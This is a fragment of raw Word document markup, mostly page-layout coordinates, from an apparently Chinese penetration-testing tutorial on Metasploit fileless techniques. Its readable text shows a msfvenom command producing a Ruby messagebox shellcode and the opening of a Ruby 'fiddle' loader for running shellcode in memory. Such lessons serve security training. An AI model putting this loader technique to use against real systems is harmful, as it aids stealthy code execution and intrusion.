      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:516.600pt;width:387.600pt;height:177.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index: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本季是为配合msf在渗透过程中无文件渗透，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提前做基础过度。也为msf插件编写做基础过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度。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ruby</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t> 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shellcode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生成如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="158" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="235" w:lineRule="auto"/>
        <w:ind w:left="1720" w:right="154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msfvenom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messagebox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TEXT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Micropoor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TITLE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Micropoor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ruby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‐‐sma</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>llest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="13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09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附</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>源码：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0076a9"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>require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59800"/>
          <w:spacing w:val="9"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'fiddle'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require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59800"/>
          <w:spacing w:val="8"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'fiddle/import'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14.732pt;width:0.0pt;height:827.267pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,294" coordsize="0,16545">
        <v:shape style="position:absolute;left:10402;top:294;width:0;height:16545" coordorigin="10402,294" coordsize="0,16545" path="m10402,294l10402,294,10402,294,10402,294,10402,294,10402,295,10402,295,10402,296,10402,298,10402,299,10402,301,10402,304,10402,307,10402,311,10402,316,10402,321,10402,327,10402,334,10402,342,10402,351,10402,361,10402,373,10402,385,10402,399,10402,414,10402,430,10402,448,10402,467,10402,487,10402,510,10402,534,10402,559,10402,587,10402,616,10402,647,10402,680,10402,715,10402,752,10402,791,10402,833,10402,877,10402,923,10402,971,10402,1022,10402,1075,10402,1131,10402,1189,10402,1250,10402,1314,10402,1380,10402,1449,10402,1521,10402,1597,10402,1675,10402,1756,10402,1840,10402,1928,10402,2018,10402,2112,10402,2210,10402,2311,10402,2415,10402,2523,10402,2634,10402,2749,10402,2868,10402,2990,10402,3117,10402,3247,10402,3381,10402,3520,10402,3662,10402,3808,10402,3959,10402,4114,10402,4273,10402,4436,10402,4604,10402,4777,10402,4953,10402,5135,10402,5321,10402,5512,10402,5708,10402,5908,10402,6113,10402,6324,10402,6539,10402,6760,10402,6985,10402,7216,10402,7452,10402,7693,10402,7940,10402,8192,10402,8449,10402,8712,10402,8981,10402,9255,10402,9535,10402,9821,10402,10112,10402,10410,10402,10713,10402,11023,10402,11338,10402,11660,10402,11988,10402,12322,10402,12662,10402,13009,10402,13362,10402,13722,10402,14088,10402,14461,10402,14840,10402,15227,10402,15619,10402,16019,10402,16426,10402,16840e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:33.500pt;width:449.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,670" coordsize="8990,370">
        <v:shape style="position:absolute;left:1490;top:670;width:8990;height:370" coordorigin="1490,670" coordsize="8990,370" path="m1510,684l1510,684,1510,684,1510,684,1510,684,1510,684,1510,684,1511,684,1512,684,1512,684,1514,684,1515,684,1517,684,1519,684,1521,684,1524,684,1528,684,1532,684,1536,684,1541,684,1546,684,1552,684,1559,684,1566,684,1575,684,1583,684,1593,684,1603,684,1615,684,1627,684,1640,684,1654,684,1668,684,1684,684,1701,684,1719,684,1738,684,1758,684,1780,684,1802,684,1826,684,1851,684,1877,684,1904,684,1933,684,1963,684,1995,684,2028,684,2063,684,2099,684,2136,684,2175,684,2216,684,2259,684,2303,684,2348,684,2396,684,2445,684,2496,684,2549,684,2604,684,2660,684,2719,684,2779,684,2841,684,2906,684,2972,684,3041,684,3112,684,3184,684,3259,684,3336,684,3416,684,3498,684,3582,684,3668,684,3757,684,3848,684,3941,684,4037,684,4136,684,4236,684,4340,684,4446,684,4555,684,4666,684,4780,684,4897,684,5017,684,5139,684,5264,684,5392,684,5523,684,5657,684,5793,684,5933,684,6076,684,6222,684,6370,684,6522,684,6677,684,6835,684,6997,684,7161,684,7329,684,7500,684,7675,684,7853,684,8034,684,8219,684,8407,684,8598,684,8793,684,8992,684,9194,684,9400,684,9609,684,9823,684,10039,684,10260,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,684,10484,685,10484,685,10484,685,10484,685,10484,685,10484,685,10484,685,10484,685,10484,686,10484,686,10484,686,10484,686,10484,687,10484,687,10484,687,10484,688,10484,688,10484,689,10484,689,10484,690,10484,690,10484,691,10484,691,10484,692,10484,693,10484,694,10484,694,10484,695,10484,696,10484,697,10484,698,10484,699,10484,700,10484,701,10484,703,10484,704,10484,705,10484,707,10484,708,10484,709,10484,711,10484,713,10484,714,10484,716,10484,718,10484,720,10484,722,10484,724,10484,726,10484,728,10484,731,10484,733,10484,735,10484,738,10484,740,10484,743,10484,746,10484,749,10484,752,10484,755,10484,758,10484,761,10484,764,10484,767,10484,771,10484,775,10484,778,10484,782,10484,786,10484,790,10484,794,10484,798,10484,802,10484,807,10484,811,10484,816,10484,820,10484,825,10484,830,10484,835,10484,840,10484,845,10484,851,10484,856,10484,862,10484,868,10484,873,10484,879,10484,886,10484,892,10484,898,10484,905,10484,911,10484,918,10484,925,10484,932,10484,939,10484,946,10484,954,10484,961,10484,969,10484,977,10484,985,10484,993,10484,1001,10484,1009,10484,1018,10484,1027,10484,1036,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10483,1045,10482,1045,10482,1045,10480,1045,10479,1045,10477,1045,10475,1045,10473,1045,10470,1045,10466,1045,10462,1045,10458,1045,10453,1045,10448,1045,10442,1045,10435,1045,10428,1045,10419,1045,10411,1045,10401,1045,10391,1045,10379,1045,10367,1045,10354,1045,10340,1045,10326,1045,10310,1045,10293,1045,10275,1045,10256,1045,10236,1045,10215,1045,10192,1045,10168,1045,10143,1045,10117,1045,10090,1045,10061,1045,10031,1045,9999,1045,9966,1045,9931,1045,9895,1045,9858,1045,9819,1045,9778,1045,9735,1045,9691,1045,9646,1045,9598,1045,9549,1045,9498,1045,9445,1045,9391,1045,9334,1045,9275,1045,9215,1045,9153,1045,9088,1045,9022,1045,8953,1045,8883,1045,8810,1045,8735,1045,8658,1045,8578,1045,8497,1045,8413,1045,8326,1045,8238,1045,8146,1045,8053,1045,7957,1045,7859,1045,7758,1045,7654,1045,7548,1045,7439,1045,7328,1045,7214,1045,7097,1045,6977,1045,6855,1045,6730,1045,6602,1045,6471,1045,6337,1045,6201,1045,6061,1045,5918,1045,5773,1045,5624,1045,5472,1045,5317,1045,5159,1045,4997,1045,4833,1045,4665,1045,4494,1045,4319,1045,4141,1045,3960,1045,3776,1045,3587,1045,3396,1045,3201,1045,3002,1045,2800,1045,2594,1045,2385,1045,2172,1045,1955,1045,1734,1045,1510,1045,1510,1045,1510,1045,1510,1045,1510,1045,1510,1045,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1044,1510,1043,1510,1043,1510,1043,1510,1043,1510,1043,1510,1042,1510,1042,1510,1042,1510,1041,1510,1041,1510,1040,1510,1040,1510,1039,1510,1039,1510,1038,1510,1038,1510,1037,1510,1036,1510,1035,1510,1035,1510,1034,1510,1033,1510,1032,1510,1031,1510,1030,1510,1029,1510,1028,1510,1026,1510,1025,1510,1024,1510,1022,1510,1021,1510,1019,1510,1018,1510,1016,1510,1014,1510,1013,1510,1011,1510,1009,1510,1007,1510,1005,1510,1003,1510,1001,1510,998,1510,996,1510,994,1510,991,1510,988,1510,986,1510,983,1510,980,1510,977,1510,974,1510,971,1510,968,1510,965,1510,961,1510,958,1510,954,1510,951,1510,947,1510,943,1510,939,1510,935,1510,931,1510,927,1510,922,1510,918,1510,913,1510,909,1510,904,1510,899,1510,894,1510,889,1510,883,1510,878,1510,873,1510,867,1510,861,1510,855,1510,849,1510,843,1510,837,1510,831,1510,824,1510,818,1510,811,1510,804,1510,797,1510,790,1510,783,1510,775,1510,768,1510,760,1510,752,1510,744,1510,736,1510,728,1510,719,1510,711,1510,702,1510,693,1510,684e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:33.500pt;width:1.500pt;height:18.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,670" coordsize="30,370">
        <v:shape style="position:absolute;left:1490;top:670;width:30;height:370" coordorigin="1490,670" coordsize="30,370" path="m1517,684l1517,684,1517,684,1517,684,1517,684,1517,684,1517,684,1517,684,1517,684,1517,684,1517,684,1517,685,1517,685,1517,685,1517,685,1517,685,1517,685,1517,685,1517,685,1517,686,1517,686,1517,686,1517,686,1517,687,1517,687,1517,687,1517,688,1517,688,1517,689,1517,689,1517,690,1517,690,1517,691,1517,691,1517,692,1517,693,1517,694,1517,694,1517,695,1517,696,1517,697,1517,698,1517,699,1517,700,1517,701,1517,703,1517,704,1517,705,1517,707,1517,708,1517,709,1517,711,1517,713,1517,714,1517,716,1517,718,1517,720,1517,722,1517,724,1517,726,1517,728,1517,731,1517,733,1517,735,1517,738,1517,740,1517,743,1517,746,1517,749,1517,752,1517,755,1517,758,1517,761,1517,764,1517,767,1517,771,1517,775,1517,778,1517,782,1517,786,1517,790,1517,794,1517,798,1517,802,1517,807,1517,811,1517,816,1517,820,1517,825,1517,830,1517,835,1517,840,1517,845,1517,851,1517,856,1517,862,1517,868,1517,873,1517,879,1517,886,1517,892,1517,898,1517,905,1517,911,1517,918,1517,925,1517,932,1517,939,1517,946,1517,954,1517,961,1517,969,1517,977,1517,985,1517,993,1517,1001,1517,1009,1517,1018,1517,1027,1517,1036,1517,1045e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:51.500pt;width:449.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1030" coordsize="8990,390">
        <v:shape style="position:absolute;left:1490;top:1030;width:8990;height:390" coordorigin="1490,1030" coordsize="8990,390" path="m1510,1045l1510,1045,1510,1045,1510,1045,1510,1045,1510,1045,1510,1045,1511,1045,1512,1045,1512,1045,1514,1045,1515,1045,1517,1045,1519,1045,1521,1045,1524,1045,1528,1045,1532,1045,1536,1045,1541,1045,1546,1045,1552,1045,1559,1045,1566,1045,1575,1045,1583,1045,1593,1045,1603,1045,1615,1045,1627,1045,1640,1045,1654,1045,1668,1045,1684,1045,1701,1045,1719,1045,1738,1045,1758,1045,1780,1045,1802,1045,1826,1045,1851,1045,1877,1045,1904,1045,1933,1045,1963,1045,1995,1045,2028,1045,2063,1045,2099,1045,2136,1045,2175,1045,2216,1045,2259,1045,2303,1045,2348,1045,2396,1045,2445,1045,2496,1045,2549,1045,2604,1045,2660,1045,2719,1045,2779,1045,2841,1045,2906,1045,2972,1045,3041,1045,3112,1045,3184,1045,3259,1045,3336,1045,3416,1045,3498,1045,3582,1045,3668,1045,3757,1045,3848,1045,3941,1045,4037,1045,4136,1045,4236,1045,4340,1045,4446,1045,4555,1045,4666,1045,4780,1045,4897,1045,5017,1045,5139,1045,5264,1045,5392,1045,5523,1045,5657,1045,5793,1045,5933,1045,6076,1045,6222,1045,6370,1045,6522,1045,6677,1045,6835,1045,6997,1045,7161,1045,7329,1045,7500,1045,7675,1045,7853,1045,8034,1045,8219,1045,8407,1045,8598,1045,8793,1045,8992,1045,9194,1045,9400,1045,9609,1045,9823,1045,10039,1045,10260,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1045,10484,1046,10484,1046,10484,1046,10484,1046,10484,1047,10484,1047,10484,1047,10484,1048,10484,1048,10484,1048,10484,1049,10484,1049,10484,1050,10484,1051,10484,1051,10484,1052,10484,1053,10484,1053,10484,1054,10484,1055,10484,1056,10484,1057,10484,1058,10484,1059,10484,1060,10484,1061,10484,1062,10484,1063,10484,1065,10484,1066,10484,1068,10484,1069,10484,1071,10484,1072,10484,1074,10484,1076,10484,1078,10484,1080,10484,1082,10484,1084,10484,1086,10484,1088,10484,1090,10484,1093,10484,1095,10484,1098,10484,1100,10484,1103,10484,1106,10484,1109,10484,1111,10484,1115,10484,1118,10484,1121,10484,1124,10484,1128,10484,1131,10484,1135,10484,1138,10484,1142,10484,1146,10484,1150,10484,1154,10484,1159,10484,1163,10484,1167,10484,1172,10484,1176,10484,1181,10484,1186,10484,1191,10484,1196,10484,1201,10484,1207,10484,1212,10484,1218,10484,1224,10484,1229,10484,1235,10484,1242,10484,1248,10484,1254,10484,1261,10484,1267,10484,1274,10484,1281,10484,1288,10484,1295,10484,1302,10484,1310,10484,1317,10484,1325,10484,1333,10484,1341,10484,1349,10484,1357,10484,1366,10484,1374,10484,1383,10484,1392,10484,1401,10484,1410,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10483,1420,10482,1420,10482,1420,10480,1420,10479,1420,10477,1420,10475,1420,10473,1420,10470,1420,10466,1420,10462,1420,10458,1420,10453,1420,10448,1420,10442,1420,10435,1420,10428,1420,10419,1420,10411,1420,10401,1420,10391,1420,10379,1420,10367,1420,10354,1420,10340,1420,10326,1420,10310,1420,10293,1420,10275,1420,10256,1420,10236,1420,10215,1420,10192,1420,10168,1420,10143,1420,10117,1420,10090,1420,10061,1420,10031,1420,9999,1420,9966,1420,9931,1420,9895,1420,9858,1420,9819,1420,9778,1420,9735,1420,9691,1420,9646,1420,9598,1420,9549,1420,9498,1420,9445,1420,9391,1420,9334,1420,9275,1420,9215,1420,9153,1420,9088,1420,9022,1420,8953,1420,8883,1420,8810,1420,8735,1420,8658,1420,8578,1420,8497,1420,8413,1420,8326,1420,8238,1420,8146,1420,8053,1420,7957,1420,7859,1420,7758,1420,7654,1420,7548,1420,7439,1420,7328,1420,7214,1420,7097,1420,6977,1420,6855,1420,6730,1420,6602,1420,6471,1420,6337,1420,6201,1420,6061,1420,5918,1420,5773,1420,5624,1420,5472,1420,5317,1420,5159,1420,4997,1420,4833,1420,4665,1420,4494,1420,4319,1420,4141,1420,3960,1420,3776,1420,3587,1420,3396,1420,3201,1420,3002,1420,2800,1420,2594,1420,2385,1420,2172,1420,1955,1420,1734,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1419,1510,1419,1510,1419,1510,1419,1510,1419,1510,1419,1510,1419,1510,1419,1510,1418,1510,1418,1510,1418,1510,1418,1510,1417,1510,1417,1510,1417,1510,1416,1510,1416,1510,1415,1510,1415,1510,1414,1510,1414,1510,1413,1510,1412,1510,1412,1510,1411,1510,1410,1510,1409,1510,1408,1510,1407,1510,1407,1510,1405,1510,1404,1510,1403,1510,1402,1510,1401,1510,1399,1510,1398,1510,1397,1510,1395,1510,1394,1510,1392,1510,1390,1510,1388,1510,1387,1510,1385,1510,1383,1510,1381,1510,1378,1510,1376,1510,1374,1510,1372,1510,1369,1510,1367,1510,1364,1510,1361,1510,1359,1510,1356,1510,1353,1510,1350,1510,1347,1510,1343,1510,1340,1510,1337,1510,1333,1510,1329,1510,1326,1510,1322,1510,1318,1510,1314,1510,1310,1510,1306,1510,1301,1510,1297,1510,1292,1510,1288,1510,1283,1510,1278,1510,1273,1510,1268,1510,1263,1510,1257,1510,1252,1510,1246,1510,1241,1510,1235,1510,1229,1510,1223,1510,1217,1510,1210,1510,1204,1510,1197,1510,1190,1510,1183,1510,1176,1510,1169,1510,1162,1510,1155,1510,1147,1510,1139,1510,1131,1510,1123,1510,1115,1510,1107,1510,1098,1510,1090,1510,1081,1510,1072,1510,1063,1510,1054,1510,1045e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:51.500pt;width:1.500pt;height:19.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1030" coordsize="30,390">
        <v:shape style="position:absolute;left:1490;top:1030;width:30;height:390" coordorigin="1490,1030" coordsize="30,390" path="m1517,1045l1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1045,1517,1046,1517,1046,1517,1046,1517,1046,1517,1047,1517,1047,1517,1047,1517,1048,1517,1048,1517,1048,1517,1049,1517,1049,1517,1050,1517,1051,1517,1051,1517,1052,1517,1053,1517,1053,1517,1054,1517,1055,1517,1056,1517,1057,1517,1058,1517,1059,1517,1060,1517,1061,1517,1062,1517,1063,1517,1065,1517,1066,1517,1068,1517,1069,1517,1071,1517,1072,1517,1074,1517,1076,1517,1078,1517,1080,1517,1082,1517,1084,1517,1086,1517,1088,1517,1090,1517,1093,1517,1095,1517,1098,1517,1100,1517,1103,1517,1106,1517,1109,1517,1111,1517,1115,1517,1118,1517,1121,1517,1124,1517,1128,1517,1131,1517,1135,1517,1138,1517,1142,1517,1146,1517,1150,1517,1154,1517,1159,1517,1163,1517,1167,1517,1172,1517,1176,1517,1181,1517,1186,1517,1191,1517,1196,1517,1201,1517,1207,1517,1212,1517,1218,1517,1224,1517,1229,1517,1235,1517,1242,1517,1248,1517,1254,1517,1261,1517,1267,1517,1274,1517,1281,1517,1288,1517,1295,1517,1302,1517,1310,1517,1317,1517,1325,1517,1333,1517,1341,1517,1349,1517,1357,1517,1366,1517,1374,1517,1383,1517,1392,1517,1401,1517,1410,1517,1420e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:449.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="8990,330">
        <v:shape style="position:absolute;left:1490;top:1410;width:8990;height:330" coordorigin="1490,1410" coordsize="8990,330" path="m1510,1420l1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1510,1420,1511,1420,1512,1420,1512,1420,1514,1420,1515,1420,1517,1420,1519,1420,1521,1420,1524,1420,1528,1420,1532,1420,1536,1420,1541,1420,1546,1420,1552,1420,1559,1420,1566,1420,1575,1420,1583,1420,1593,1420,1603,1420,1615,1420,1627,1420,1640,1420,1654,1420,1668,1420,1684,1420,1701,1420,1719,1420,1738,1420,1758,1420,1780,1420,1802,1420,1826,1420,1851,1420,1877,1420,1904,1420,1933,1420,1963,1420,1995,1420,2028,1420,2063,1420,2099,1420,2136,1420,2175,1420,2216,1420,2259,1420,2303,1420,2348,1420,2396,1420,2445,1420,2496,1420,2549,1420,2604,1420,2660,1420,2719,1420,2779,1420,2841,1420,2906,1420,2972,1420,3041,1420,3112,1420,3184,1420,3259,1420,3336,1420,3416,1420,3498,1420,3582,1420,3668,1420,3757,1420,3848,1420,3941,1420,4037,1420,4136,1420,4236,1420,4340,1420,4446,1420,4555,1420,4666,1420,4780,1420,4897,1420,5017,1420,5139,1420,5264,1420,5392,1420,5523,1420,5657,1420,5793,1420,5933,1420,6076,1420,6222,1420,6370,1420,6522,1420,6677,1420,6835,1420,6997,1420,7161,1420,7329,1420,7500,1420,7675,1420,7853,1420,8034,1420,8219,1420,8407,1420,8598,1420,8793,1420,8992,1420,9194,1420,9400,1420,9609,1420,9823,1420,10039,1420,10260,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1420,10484,1421,10484,1421,10484,1421,10484,1421,10484,1421,10484,1422,10484,1422,10484,1422,10484,1422,10484,1423,10484,1423,10484,1424,10484,1424,10484,1424,10484,1425,10484,1426,10484,1426,10484,1427,10484,1427,10484,1428,10484,1429,10484,1430,10484,1430,10484,1431,10484,1432,10484,1433,10484,1434,10484,1435,10484,1436,10484,1438,10484,1439,10484,1440,10484,1441,10484,1443,10484,1444,10484,1446,10484,1447,10484,1449,10484,1451,10484,1452,10484,1454,10484,1456,10484,1458,10484,1460,10484,1462,10484,1464,10484,1466,10484,1469,10484,1471,10484,1474,10484,1476,10484,1479,10484,1481,10484,1484,10484,1487,10484,1490,10484,1493,10484,1496,10484,1499,10484,1502,10484,1506,10484,1509,10484,1513,10484,1516,10484,1520,10484,1524,10484,1528,10484,1532,10484,1536,10484,1540,10484,1544,10484,1549,10484,1553,10484,1558,10484,1563,10484,1567,10484,1572,10484,1577,10484,1582,10484,1588,10484,1593,10484,1599,10484,1604,10484,1610,10484,1616,10484,1622,10484,1628,10484,1634,10484,1640,10484,1647,10484,1653,10484,1660,10484,1667,10484,1673,10484,1680,10484,1688,10484,1695,10484,1702,10484,1710,10484,1718,10484,1726,10484,1734,10484,1742,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10483,1750,10482,1750,10482,1750,10480,1750,10479,1750,10477,1750,10475,1750,10473,1750,10470,1750,10466,1750,10462,1750,10458,1750,10453,1750,10448,1750,10442,1750,10435,1750,10428,1750,10419,1750,10411,1750,10401,1750,10391,1750,10379,1750,10367,1750,10354,1750,10340,1750,10326,1750,10310,1750,10293,1750,10275,1750,10256,1750,10236,1750,10215,1750,10192,1750,10168,1750,10143,1750,10117,1750,10090,1750,10061,1750,10031,1750,9999,1750,9966,1750,9931,1750,9895,1750,9858,1750,9819,1750,9778,1750,9735,1750,9691,1750,9646,1750,9598,1750,9549,1750,9498,1750,9445,1750,9391,1750,9334,1750,9275,1750,9215,1750,9153,1750,9088,1750,9022,1750,8953,1750,8883,1750,8810,1750,8735,1750,8658,1750,8578,1750,8497,1750,8413,1750,8326,1750,8238,1750,8146,1750,8053,1750,7957,1750,7859,1750,7758,1750,7654,1750,7548,1750,7439,1750,7328,1750,7214,1750,7097,1750,6977,1750,6855,1750,6730,1750,6602,1750,6471,1750,6337,1750,6201,1750,6061,1750,5918,1750,5773,1750,5624,1750,5472,1750,5317,1750,5159,1750,4997,1750,4833,1750,4665,1750,4494,1750,4319,1750,4141,1750,3960,1750,3776,1750,3587,1750,3396,1750,3201,1750,3002,1750,2800,1750,2594,1750,2385,1750,2172,1750,1955,1750,1734,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1749,1510,1748,1510,1748,1510,1748,1510,1747,1510,1747,1510,1747,1510,1746,1510,1746,1510,1746,1510,1745,1510,1745,1510,1744,1510,1743,1510,1743,1510,1742,1510,1741,1510,1741,1510,1740,1510,1739,1510,1738,1510,1737,1510,1736,1510,1735,1510,1734,1510,1733,1510,1732,1510,1731,1510,1730,1510,1728,1510,1727,1510,1725,1510,1724,1510,1722,1510,1721,1510,1719,1510,1717,1510,1715,1510,1714,1510,1712,1510,1710,1510,1708,1510,1705,1510,1703,1510,1701,1510,1699,1510,1696,1510,1694,1510,1691,1510,1688,1510,1686,1510,1683,1510,1680,1510,1677,1510,1674,1510,1670,1510,1667,1510,1664,1510,1660,1510,1657,1510,1653,1510,1650,1510,1646,1510,1642,1510,1638,1510,1634,1510,1630,1510,1625,1510,1621,1510,1616,1510,1612,1510,1607,1510,1602,1510,1597,1510,1592,1510,1587,1510,1582,1510,1577,1510,1571,1510,1565,1510,1560,1510,1554,1510,1548,1510,1542,1510,1536,1510,1529,1510,1523,1510,1517,1510,1510,1510,1503,1510,1496,1510,1489,1510,1482,1510,1475,1510,1467,1510,1460,1510,1452,1510,1444,1510,1436,1510,1428,1510,1420e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:70.500pt;width:1.500pt;height:16.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1410" coordsize="30,330">
        <v:shape style="position:absolute;left:1490;top:1410;width:30;height:330" coordorigin="1490,1410" coordsize="30,330" path="m1517,1420l1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1420,1517,1421,1517,1421,1517,1421,1517,1421,1517,1421,1517,1422,1517,1422,1517,1422,1517,1422,1517,1423,1517,1423,1517,1424,1517,1424,1517,1424,1517,1425,1517,1426,1517,1426,1517,1427,1517,1427,1517,1428,1517,1429,1517,1430,1517,1430,1517,1431,1517,1432,1517,1433,1517,1434,1517,1435,1517,1436,1517,1438,1517,1439,1517,1440,1517,1441,1517,1443,1517,1444,1517,1446,1517,1447,1517,1449,1517,1451,1517,1452,1517,1454,1517,1456,1517,1458,1517,1460,1517,1462,1517,1464,1517,1466,1517,1469,1517,1471,1517,1474,1517,1476,1517,1479,1517,1481,1517,1484,1517,1487,1517,1490,1517,1493,1517,1496,1517,1499,1517,1502,1517,1506,1517,1509,1517,1513,1517,1516,1517,1520,1517,1524,1517,1528,1517,1532,1517,1536,1517,1540,1517,1544,1517,1549,1517,1553,1517,1558,1517,1563,1517,1567,1517,1572,1517,1577,1517,1582,1517,1588,1517,1593,1517,1599,1517,1604,1517,1610,1517,1616,1517,1622,1517,1628,1517,1634,1517,1640,1517,1647,1517,1653,1517,1660,1517,1667,1517,1673,1517,1680,1517,1688,1517,1695,1517,1702,1517,1710,1517,1718,1517,1726,1517,1734,1517,1742,1517,1750e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:86.500pt;width:449.500pt;height:32.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,1730" coordsize="8990,650">
        <v:shape style="position:absolute;left:1490;top:1730;width:8990;height:650" coordorigin="1490,1730" coordsize="8990,650" path="m1510,1750l1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1510,1750,1511,1750,1512,1750,1512,1750,1514,1750,1515,1750,1517,1750,1519,1750,1521,1750,1524,1750,1528,1750,1532,1750,1536,1750,1541,1750,1546,1750,1552,1750,1559,1750,1566,1750,1575,1750,1583,1750,1593,1750,1603,1750,1615,1750,1627,1750,1640,1750,1654,1750,1668,1750,1684,1750,1701,1750,1719,1750,1738,1750,1758,1750,1780,1750,1802,1750,1826,1750,1851,1750,1877,1750,1904,1750,1933,1750,1963,1750,1995,1750,2028,1750,2063,1750,2099,1750,2136,1750,2175,1750,2216,1750,2259,1750,2303,1750,2348,1750,2396,1750,2445,1750,2496,1750,2549,1750,2604,1750,2660,1750,2719,1750,2779,1750,2841,1750,2906,1750,2972,1750,3041,1750,3112,1750,3184,1750,3259,1750,3336,1750,3416,1750,3498,1750,3582,1750,3668,1750,3757,1750,3848,1750,3941,1750,4037,1750,4136,1750,4236,1750,4340,1750,4446,1750,4555,1750,4666,1750,4780,1750,4897,1750,5017,1750,5139,1750,5264,1750,5392,1750,5523,1750,5657,1750,5793,1750,5933,1750,6076,1750,6222,1750,6370,1750,6522,1750,6677,1750,6835,1750,6997,1750,7161,1750,7329,1750,7500,1750,7675,1750,7853,1750,8034,1750,8219,1750,8407,1750,8598,1750,8793,1750,8992,1750,9194,1750,9400,1750,9609,1750,9823,1750,10039,1750,10260,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1750,10484,1751,10484,1751,10484,1751,10484,1751,10484,1751,10484,1752,10484,1752,10484,1753,10484,1753,10484,1753,10484,1754,10484,1755,10484,1755,10484,1756,10484,1757,10484,1757,10484,1758,10484,1759,10484,1760,10484,1761,